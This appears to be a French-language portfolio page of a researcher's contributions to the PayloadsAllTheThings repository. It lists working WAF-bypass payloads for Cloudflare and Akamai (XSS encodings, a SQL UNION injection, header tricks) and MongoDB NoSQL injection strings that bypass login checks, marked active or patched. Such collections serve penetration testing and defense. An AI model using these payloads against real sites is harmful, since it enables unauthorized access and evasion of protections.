Audit Web2025Open Source Contribution

PayloadsAllTheThings

40+ payloads de bypass WAF Cloudflare/Akamai et une section complète NoSQL injection MongoDB contribués au repo de référence (60k+ stars).

PayloadsAllTheThings — contributions

WAF Bypass — Cloudflare22 payloads

<img src=x onerror=\u0061lert(1)>Unicode normalizationactive

%253Cscript%253Ealert(1)%253C/script%253EDouble URL encodingactive

Transfer-Encoding: chunked\r\n1\r\n<\r\nChunked transferpatched

param=val&param=<script>alert(1)</script>HTTP param pollutionactive

WAF Bypass — Akamai18 payloads

1'/*!50000UNION*//*!50000SELECT*/1,2,3--Versioned commentsactive

jaVasCript:/*-/*`/*\`/*'/*"/**/(alert(1))/JS obfuscationactive

X-Original-URL: /adminNon-standard headerspatched

NoSQL Injection — MongoDBOpérateurs + blind

{"username": {"$ne": ""}, "password": {"$ne": ""}}$ne operatoractive

{"username": {"$regex": "^admin"}}$regex extractionactive

{"$where": "sleep(5000)"}Blind timingactive

{"username": {"$gt": ""}, "password": {"$gt": ""}}$gt bypassactive

Impact

Utilisé par la communauté

Unicode normalization, double URL encoding, chunked transfer, HTTP parameter pollution. 22 payloads testés et datés.

Commentaires SQL versionnés, obfuscation JS, headers non standards, différences de parsing backend/WAF.

Opérateurs $gt, $ne, $regex, $where. Blind injection via timing. Extraction caractère par caractère. Bypass Mongoose.

Intégré dans sqlmap et NoSQLMap. Référencé dans formations OSCP/OSWE. Milliers d'utilisateurs quotidiens.

40+

Payloads contribués

60k+

Stars du repo

Sections majeures

Outils intégrés

Domaines

Security ResearchWAF BypassNoSQLMongoDBCloudflareAkamai

Des payloads testés, datés et utilisés par la communauté pentest mondiale.